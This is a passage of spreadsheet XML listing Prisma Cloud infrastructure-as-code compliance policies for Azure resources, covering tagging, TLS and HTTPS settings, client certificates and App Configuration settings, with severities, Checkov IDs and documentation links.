ocal-network,azure-service-fabric-mesh-secret,azure-service-fabric-mesh-secret-value,azure-servicebus-namespace,azure-shared-image,azure-shared-image-gallery,azure-shared-image-version,azure-signalr-service,azure-snapshot,azure-spatial-anchors-account,azure-spring-cloud-service,azure-sql-database,azure-sql-elasticpool,azure-sql-failover-group,azure-sql-server,azure-ssh-public-key,azure-stack-hci-cluster,azure-storage-account,azure-storage-sync,azure-stream-analytics-job,azure-subnet-service-endpoint-storage-policy,azure-subscription,azure-subscription-template-deployment,azure-synapse-spark-pool,azure-synapse-sql-pool,azure-synapse-workspace,azure-tenant-template-deployment,azure-traffic-manager-profile,azure-user-assigned-identity,azure-virtual-desktop-application-group,azure-virtual-desktop-host-pool,azure-virtual-desktop-workspace,azure-virtual-hub,azure-virtual-hub-security-partner-provider,azure-virtual-machine,azure-virtual-machine-extension,azure-virtual-machine-scale-set,azure-virtual-network,azure-virtual-network-gateway,azure-virtual-network-gateway-connection,azure-virtual-wan,azure-vmware-private-cloud,azure-vpn-gateway,azure-vpn-server-configuration,azure-vpn-site,azure-web-application-firewall-policy,azure-windows-virtual-machine,azure-windows-virtual-machine-scale-set</t>
        </is>
      </c>
      <c r="W861" t="inlineStr">
        <is>
          <t>Ensure Azure resources that support tags have tags</t>
        </is>
      </c>
      <c r="X861" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-azure-resources-that-support-tags-have-tags</t>
        </is>
      </c>
      <c r="Y861" t="inlineStr"/>
      <c r="Z861" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_analysis_services_server","azurerm_api_management","azurerm_api_management_named_value","azurerm_api_management_property","azurerm_app_configuration","azurerm_app_service","azurerm_app_service_certificate","azurerm_app_service_certificate_order","azurerm_app_service_environment","azurerm_app_service_managed_certificate","azurerm_app_service_plan","azurerm_app_service_slot","azurerm_application_gateway","azurerm_application_insights","azurerm_application_insights_web_test","azurerm_application_security_group","azurerm_attestation_provider","azurerm_automation_account","azurerm_automation_dsc_configuration","azurerm_automation_runbook","azurerm_availability_set","azurerm_backup_policy_vm","azurerm_backup_protected_vm","azurerm_bastion_host","azurerm_batch_account","azurerm_bot_channels_registration","azurerm_bot_connection","azurerm_bot_web_app","azurerm_cdn_endpoint","azurerm_cdn_profile","azurerm_cognitive_account","azurerm_communication_service","azurerm_container_group","azurerm_container_registry","azurerm_container_registry_webhook","azurerm_cosmosdb_account","azurerm_custom_provider","azurerm_dashboard","azurerm_data_factory","azurerm_data_factory_linked_service_azure_databricks","azurerm_data_lake_analytics_account","azurerm_data_lake_store","azurerm_data_share_account","azurerm_database_migration_project","azurerm_database_migration_service","azurerm_databox_edge_device","azurerm_databricks_workspace","azurerm_dedicated_hardware_security_module","azurerm_dedicated_host","azurerm_dedicated_host_group","azurerm_dev_test_global_vm_shutdown_schedule","azurerm_dev_test_lab","azurerm_dev_test_linux_virtual_machine","azurerm_dev_test_policy","azurerm_dev_test_schedule","azurerm_dev_test_virtual_network","azurerm_dev_test_windows_virtual_machine","azurerm_devspace_controller","azurerm_digital_twins_instance","azurerm_disk_access","azurerm_disk_encryption_set","azurerm_dns_a_record","azurerm_dns_aaaa_record","azurerm_dns_caa_record","azurerm_dns_cname_record","azurerm_dns_mx_record","azurerm_dns_ns_record","azurerm_dns_ptr_record","azurerm_dns_srv_record","azurerm_dns_txt_record","azurerm_dns_zone","azurerm_eventgrid_domain","azurerm_eventgrid_system_topic","azurerm_eventgrid_topic","azurerm_eventhub_cluster","azurerm_eventhub_namespace","azurerm_express_route_circuit","azurerm_express_route_gateway","azurerm_express_route_port","azurerm_firewall","azurerm_firewall_policy","azurerm_frontdoor","azurerm_frontdoor_firewall_policy","azurerm_function_app","azurerm_function_app_slot","azurerm_hdinsight_hadoop_cluster","azurerm_hdinsight_hbase_cluster","azurerm_hdinsight_interactive_query_cluster","azurerm_hdinsight_kafka_cluster","azurerm_hdinsight_ml_services_cluster","azurerm_hdinsight_rserver_cluster","azurerm_hdinsight_spark_cluster","azurerm_hdinsight_storm_cluster","azurerm_healthcare_service","azurerm_hpc_cache","azurerm_image","azurerm_integration_service_environment","azurerm_iot_security_solution","azurerm_iot_time_series_insights_gen2_environment","azurerm_iot_time_series_insights_reference_data_set","azurerm_iot_time_series_insights_standard_environment","azurerm_iotcentral_application","azurerm_iothub","azurerm_iothub_dps","azurerm_ip_group","azurerm_key_vault","azurerm_key_vault_certificate","azurerm_key_vault_key","azurerm_key_vault_secret","azurerm_kubernetes_cluster","azurerm_kubernetes_cluster_node_pool","azurerm_kusto_cluster","azurerm_lb","azurerm_linux_virtual_machine","azurerm_linux_virtual_machine_scale_set","azurerm_local_network_gateway","azurerm_log_analytics_cluster","azurerm_log_analytics_linked_service","azurerm_log_analytics_saved_search","azurerm_log_analytics_solution","azurerm_log_analytics_storage_insights","azurerm_log_analytics_workspace","azurerm_logic_app_integration_account","azurerm_logic_app_workflow","azurerm_machine_learning_workspace","azurerm_maintenance_configuration","azurerm_managed_application","azurerm_managed_application_definition","azurerm_managed_disk","azurerm_management_group_template_deployment","azurerm_maps_account","azurerm_mariadb_server","azurerm_media_live_event","azurerm_media_services_account","azurerm_media_streaming_endpoint","azurerm_monitor_action_group","azurerm_monitor_action_rule_action_group","azurerm_monitor_action_rule_suppression","azurerm_monitor_activity_log_alert","azurerm_monitor_autoscale_setting","azurerm_monitor_metric_alert","azurerm_monitor_scheduled_query_rules_alert","azurerm_monitor_scheduled_query_rules_log","azurerm_monitor_smart_detector_alert_rule","azurerm_mssql_database","azurerm_mssql_elasticpool","azurerm_mssql_server","azurerm_mssql_virtual_machine","azurerm_mysql_server","azurerm_nat_gateway","azurerm_netapp_account","azurerm_netapp_pool","azurerm_netapp_snapshot","azurerm_netapp_volume","azurerm_network_connection_monitor","azurerm_network_ddos_protection_plan","azurerm_network_interface","azurerm_network_profile","azurerm_network_security_group","azurerm_network_watcher","azurerm_notification_hub","azurerm_notification_hub_namespace","azurerm_orchestrated_virtual_machine_scale_set","azurerm_point_to_site_vpn_gateway","azurerm_postgresql_server","azurerm_powerbi_embedded","azurerm_private_dns_a_record","azurerm_private_dns_aaaa_record","azurerm_private_dns_cname_record","azurerm_private_dns_mx_record","azurerm_private_dns_ptr_record","azurerm_private_dns_srv_record","azurerm_private_dns_txt_record","azurerm_private_dns_zone","azurerm_private_dns_zone_virtual_network_link","azurerm_private_endpoint","azurerm_private_link_service","azurerm_proximity_placement_group","azurerm_public_ip","azurerm_public_ip_prefix","azurerm_purview_account","azurerm_recovery_services_vault","azurerm_redis_cache","azurerm_redis_enterprise_cluster","azurerm_relay_namespace","azurerm_resource_group","azurerm_resource_group_template_deployment","azurerm_route_filter","azurerm_route_table","azurerm_search_service","azurerm_security_center_automation","azurerm_service_fabric_cluster","azurerm_service_fabric_mesh_application","azurerm_service_fabric_mesh_local_network","azurerm_service_fabric_mesh_secret","azurerm_service_fabric_mesh_secret_value","azurerm_servicebus_namespace","azurerm_shared_image","azurerm_shared_image_gallery","azurerm_shared_image_version","azurerm_signalr_service","azurerm_snapshot","azurerm_spatial_anchors_account","azurerm_spring_cloud_service","azurerm_sql_database","azurerm_sql_elasticpool","azurerm_sql_failover_group","azurerm_sql_server","azurerm_ssh_public_key","azurerm_stack_hci_cluster","azurerm_storage_account","azurerm_storage_sync","azurerm_stream_analytics_job","azurerm_subnet_service_endpoint_storage_policy","azurerm_subscription","azurerm_subscription_template_deployment","azurerm_synapse_spark_pool","azurerm_synapse_sql_pool","azurerm_synapse_workspace","azurerm_tenant_template_deployment","azurerm_traffic_manager_profile","azurerm_user_assigned_identity","azurerm_virtual_desktop_application_group","azurerm_virtual_desktop_host_pool","azurerm_virtual_desktop_workspace","azurerm_virtual_hub","azurerm_virtual_hub_security_partner_provider","azurerm_virtual_machine","azurerm_virtual_machine_extension","azurerm_virtual_machine_scale_set","azurerm_virtual_network","azurerm_virtual_network_gateway","azurerm_virtual_network_gateway_connection","azurerm_virtual_wan","azurerm_vmware_private_cloud","azurerm_vpn_gateway","azurerm_vpn_server_configuration","azurerm_vpn_site","azurerm_web_application_firewall_policy","azurerm_windows_virtual_machine","azurerm_windows_virtual_machine_scale_set"]}</t>
        </is>
      </c>
      <c r="AA861" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB861" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC861" t="inlineStr">
        <is>
          <t>CKV_AZURE_CUSTOM_1</t>
        </is>
      </c>
      <c r="AD861" t="b">
        <v>1</v>
      </c>
      <c r="AE861" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF861" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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1" t="inlineStr">
        <is>
          <t>cbdcfe66-249f-4e7b-8184-eb8b77b33b49</t>
        </is>
      </c>
      <c r="AI861" t="inlineStr"/>
      <c r="AJ861" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK861" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="862">
      <c r="A862" t="inlineStr"/>
      <c r="B862" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C862" s="2" t="inlineStr"/>
      <c r="D862" t="inlineStr"/>
      <c r="E862" t="inlineStr"/>
      <c r="F862" t="inlineStr"/>
      <c r="G862" t="b">
        <v>1</v>
      </c>
      <c r="H8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2" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J862" t="inlineStr">
        <is>
          <t>IaC:General:azure-api</t>
        </is>
      </c>
      <c r="K862" t="inlineStr">
        <is>
          <t>Azure Client Certificates are not enforced for API management</t>
        </is>
      </c>
      <c r="L862" t="inlineStr"/>
      <c r="M862" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N862" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O862" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P862" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q862" t="inlineStr"/>
      <c r="R862" t="inlineStr"/>
      <c r="S862" t="inlineStr"/>
      <c r="T862" t="b">
        <v>0</v>
      </c>
      <c r="U862" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V862" t="inlineStr">
        <is>
          <t>IaC:General:azure-api-management</t>
        </is>
      </c>
      <c r="W862" t="inlineStr">
        <is>
          <t>Ensure Client Certificates are enforced for API management</t>
        </is>
      </c>
      <c r="X862" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-azure-client-certificates-are-enforced-for-api-management</t>
        </is>
      </c>
      <c r="Y862" t="inlineStr"/>
      <c r="Z862" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_api_management"]}</t>
        </is>
      </c>
      <c r="AA862" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB862" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC862" t="inlineStr">
        <is>
          <t>CKV_AZURE_152</t>
        </is>
      </c>
      <c r="AD862" t="b">
        <v>1</v>
      </c>
      <c r="AE862" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF862" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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2" t="inlineStr">
        <is>
          <t>3b025847-6774-45ed-9b4d-8d2f5e49f379</t>
        </is>
      </c>
      <c r="AI862" t="inlineStr"/>
      <c r="AJ862" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK862" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="863">
      <c r="A863" t="inlineStr"/>
      <c r="B863" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C863" s="2" t="inlineStr"/>
      <c r="D863" t="inlineStr"/>
      <c r="E863" t="inlineStr"/>
      <c r="F863" t="inlineStr"/>
      <c r="G863" t="b">
        <v>1</v>
      </c>
      <c r="H8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3" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J863" t="inlineStr">
        <is>
          <t>IaC:General:azure-api</t>
        </is>
      </c>
      <c r="K863" t="inlineStr">
        <is>
          <t>API Management Without Minimum TLS 1.2</t>
        </is>
      </c>
      <c r="L863" t="inlineStr"/>
      <c r="M863" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N863" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O863" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P863" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q863" t="inlineStr"/>
      <c r="R863" t="inlineStr"/>
      <c r="S863" t="inlineStr"/>
      <c r="T863" t="b">
        <v>0</v>
      </c>
      <c r="U863" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V863" t="inlineStr">
        <is>
          <t>IaC:General:azure-api-management</t>
        </is>
      </c>
      <c r="W863" t="inlineStr">
        <is>
          <t>Ensure API management uses at least TLS 1.2</t>
        </is>
      </c>
      <c r="X863" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.paloaltonetworks.com/prisma/prisma-cloud/prisma-cloud-code-security-policy-reference/azure-policies/azure-general-policies/azr-general-173</t>
        </is>
      </c>
      <c r="Y863" t="inlineStr"/>
      <c r="Z863" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_api_management"]}</t>
        </is>
      </c>
      <c r="AA863" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB863" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC863" t="inlineStr">
        <is>
          <t>CKV_AZURE_173</t>
        </is>
      </c>
      <c r="AD863" t="b">
        <v>1</v>
      </c>
      <c r="AE863" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF863" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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3" t="inlineStr">
        <is>
          <t>0a22a80d-8146-4242-b6c7-254ecbeab711</t>
        </is>
      </c>
      <c r="AI863" t="inlineStr"/>
      <c r="AJ863" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK863" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="864">
      <c r="A864" t="inlineStr"/>
      <c r="B864" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C864" s="2" t="inlineStr"/>
      <c r="D864" t="inlineStr"/>
      <c r="E864" t="inlineStr"/>
      <c r="F864" t="inlineStr"/>
      <c r="G864" t="b">
        <v>1</v>
      </c>
      <c r="H8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4" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J864" t="inlineStr">
        <is>
          <t>IaC:General:azure-api</t>
        </is>
      </c>
      <c r="K864" t="inlineStr">
        <is>
          <t>Backend of the API management system does not utilize HTTPS</t>
        </is>
      </c>
      <c r="L864" t="inlineStr"/>
      <c r="M864" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N864" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O864" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P864" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q864" t="inlineStr"/>
      <c r="R864" t="inlineStr"/>
      <c r="S864" t="inlineStr"/>
      <c r="T864" t="b">
        <v>0</v>
      </c>
      <c r="U864" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V864" t="inlineStr">
        <is>
          <t>IaC:General:azure-api-management-backend</t>
        </is>
      </c>
      <c r="W864" t="inlineStr">
        <is>
          <t>Ensure API management backend uses https</t>
        </is>
      </c>
      <c r="X864" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/bc-azure-215</t>
        </is>
      </c>
      <c r="Y864" t="inlineStr"/>
      <c r="Z864" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_api_management_backend"]}</t>
        </is>
      </c>
      <c r="AA864" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB864" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC864" t="inlineStr">
        <is>
          <t>CKV_AZURE_215</t>
        </is>
      </c>
      <c r="AD864" t="b">
        <v>1</v>
      </c>
      <c r="AE864" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF864" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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4" t="inlineStr">
        <is>
          <t>bd236c38-9ebd-406b-af21-c1147994fb00</t>
        </is>
      </c>
      <c r="AI864" t="inlineStr"/>
      <c r="AJ864" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK864" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="865">
      <c r="A865" t="inlineStr"/>
      <c r="B865" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C865" s="2" t="inlineStr"/>
      <c r="D865" t="inlineStr"/>
      <c r="E865" t="inlineStr"/>
      <c r="F865" t="inlineStr"/>
      <c r="G865" t="b">
        <v>1</v>
      </c>
      <c r="H8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5" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J865" t="inlineStr">
        <is>
          <t>IaC:General:azure-app</t>
        </is>
      </c>
      <c r="K865" t="inlineStr">
        <is>
          <t>App Configuration Encryption Block Not Set</t>
        </is>
      </c>
      <c r="L865" t="inlineStr"/>
      <c r="M865" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N865" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O865" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P865" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q865" t="inlineStr"/>
      <c r="R865" t="inlineStr"/>
      <c r="S865" t="inlineStr"/>
      <c r="T865" t="b">
        <v>0</v>
      </c>
      <c r="U865" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V865" t="inlineStr">
        <is>
          <t>IaC:General:azure-app-configuration</t>
        </is>
      </c>
      <c r="W865" t="inlineStr">
        <is>
          <t>Ensure App configuration encryption block is set.</t>
        </is>
      </c>
      <c r="X865" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.paloaltonetworks.com/prisma/prisma-cloud/prisma-cloud-code-security-policy-reference/azure-policies/azure-general-policies/azr-general-186</t>
        </is>
      </c>
      <c r="Y865" t="inlineStr"/>
      <c r="Z865" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_app_configuration"]}</t>
        </is>
      </c>
      <c r="AA865" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB865" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC865" t="inlineStr">
        <is>
          <t>CKV_AZURE_186</t>
        </is>
      </c>
      <c r="AD865" t="b">
        <v>1</v>
      </c>
      <c r="AE865" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF865" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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5" t="inlineStr">
        <is>
          <t>39efff41-65d9-4d50-bf21-c7513effd450</t>
        </is>
      </c>
      <c r="AI865" t="inlineStr"/>
      <c r="AJ865" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK865" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="866">
      <c r="A866" t="inlineStr"/>
      <c r="B866" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C866" s="2" t="inlineStr"/>
      <c r="D866" t="inlineStr"/>
      <c r="E866" t="inlineStr"/>
      <c r="F866" t="inlineStr"/>
      <c r="G866" t="b">
        <v>1</v>
      </c>
      <c r="H8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6" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J866" t="inlineStr">
        <is>
          <t>IaC:General:azure-app</t>
        </is>
      </c>
      <c r="K866" t="inlineStr">
        <is>
          <t>App Configuration Without Purge Protection Enabled</t>
        </is>
      </c>
      <c r="L866" t="inlineStr"/>
      <c r="M866" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N866" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O866" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P866" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q866" t="inlineStr"/>
      <c r="R866" t="inlineStr"/>
      <c r="S866" t="inlineStr"/>
      <c r="T866" t="b">
        <v>0</v>
      </c>
      <c r="U866" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V866" t="inlineStr">
        <is>
          <t>IaC:General:azure-app-configuration</t>
        </is>
      </c>
      <c r="W866" t="inlineStr">
        <is>
          <t>Ensure App configuration purge protection is enabled</t>
        </is>
      </c>
      <c r="X866" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.paloaltonetworks.com/prisma/prisma-cloud/prisma-cloud-code-security-policy-reference/azure-policies/azure-general-policies/azr-general-187</t>
        </is>
      </c>
      <c r="Y866" t="inlineStr"/>
      <c r="Z866" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_app_configuration"]}</t>
        </is>
      </c>
      <c r="AA866" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB866" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC866" t="inlineStr">
        <is>
          <t>CKV_AZURE_187</t>
        </is>
      </c>
      <c r="AD866" t="b">
        <v>1</v>
      </c>
      <c r="AE866" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF866" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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6" t="inlineStr">
        <is>
          <t>4d8a83ef-21cb-4df2-84d0-a992f7fb915b</t>
        </is>
      </c>
      <c r="AI866" t="inlineStr"/>
      <c r="AJ866" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK866" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="867">
      <c r="A867" t="inlineStr"/>
      <c r="B867" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C867" s="2" t="inlineStr"/>
      <c r="D867" t="inlineStr"/>
      <c r="E867" t="inlineStr"/>
      <c r="F867" t="inlineStr"/>
      <c r="G867" t="b">
        <v>1</v>
      </c>
      <c r="H8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7" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J867" t="inlineStr">
        <is>
          <t>IaC:General:azure-app</t>
        </is>
      </c>
      <c r="K867" t="inlineStr">
        <is>
          <t>App Configuration Not Using Standard SKU</t>
        </is>
      </c>
      <c r="L867" t="inlineStr"/>
      <c r="M867" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N867" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O867" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P867" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q867" t="inlineStr"/>
      <c r="R867" t="inlineStr"/>
      <c r="S867" t="inlineStr"/>
      <c r="T867" t="b">
        <v>0</v>
      </c>
      <c r="U867" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V867" t="inlineStr">
        <is>
          <t>IaC:General:azure-app-configuration</t>
        </is>
      </c>
      <c r="W867" t="inlineStr">
        <is>
          <t>Ensure App configuration SKU is standard</t>
        </is>
      </c>
      <c r="X867" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.paloaltonetworks.com/prisma/prisma-cloud/prisma-cloud-code-security-policy-reference/azure-policies/azure-general-policies/azr-general-188</t>
        </is>
      </c>
      <c r="Y867" t="inlineStr"/>
      <c r="Z867" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_app_configuration"]}</t>
        </is>
      </c>
      <c r="AA867" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB867" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC867" t="inlineStr">
        <is>
          <t>CKV_AZURE_188</t>
        </is>
      </c>
      <c r="AD867" t="b">
        <v>1</v>
      </c>
      <c r="AE867" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF867" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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7" t="inlineStr">
        <is>
          <t>cde10a12-78f0-45c5-b2bb-0f831da82ede</t>
        </is>
      </c>
      <c r="AI867" t="inlineStr"/>
      <c r="AJ867" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK867" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="868">
      <c r="A868" t="inlineStr"/>
      <c r="B868" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C868" s="2" t="inlineStr"/>
      <c r="D868" t="inlineStr"/>
      <c r="E868" t="inlineStr"/>
      <c r="F868" t="inlineStr"/>
      <c r="G868" t="b">
        <v>1</v>
      </c>
      <c r="H8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8" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J868" t="inlineStr">
        <is>
          <t>IaC:General:azure-app</t>
        </is>
      </c>
      <c r="K868" t="inlineStr">
        <is>
          <t>App services do not use Azure files</t>
        </is>
      </c>
      <c r="L868" t="inlineStr"/>
      <c r="M868" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N868" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O868" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P868" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q868" t="inlineStr"/>
      <c r="R868" t="inlineStr"/>
      <c r="S868" t="inlineStr"/>
      <c r="T868" t="b">
        <v>0</v>
      </c>
      <c r="U868" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V868" t="inlineStr">
        <is>
          <t>IaC:General:azure-app-service</t>
        </is>
      </c>
      <c r="W868" t="inlineStr">
        <is>
          <t>Ensure that app services use Azure Files</t>
        </is>
      </c>
      <c r="X868" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-that-app-services-use-azure-files</t>
        </is>
      </c>
      <c r="Y868" t="inlineStr"/>
      <c r="Z868" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_app_service"]}</t>
        </is>
      </c>
      <c r="AA868" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB868" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC868" t="inlineStr">
        <is>
          <t>CKV_AZURE_88</t>
        </is>
      </c>
      <c r="AD868" t="b">
        <v>1</v>
      </c>
      <c r="AE868" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF868" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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8" t="inlineStr">
        <is>
          <t>5fffbe0b-dafe-4774-b8de-dad2231047c3</t>
        </is>
      </c>
      <c r="AI868" t="inlineStr"/>
      <c r="AJ868" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK868" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="869">
      <c r="A869" t="inlineStr"/>
      <c r="B869" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C869" s="2" t="inlineStr"/>
      <c r="D869" t="inlineStr"/>
      <c r="E869" t="inlineStr"/>
      <c r="F869" t="inlineStr"/>
      <c r="G869" t="b">
        <v>1</v>
      </c>
      <c r="H8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69" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J869" t="inlineStr">
        <is>
          <t>IaC:General:azure-app</t>
        </is>
      </c>
      <c r="K869" t="inlineStr">
        <is>
          <t>Azure App Service Web app does not use latest Python version</t>
        </is>
      </c>
      <c r="L869" t="inlineStr"/>
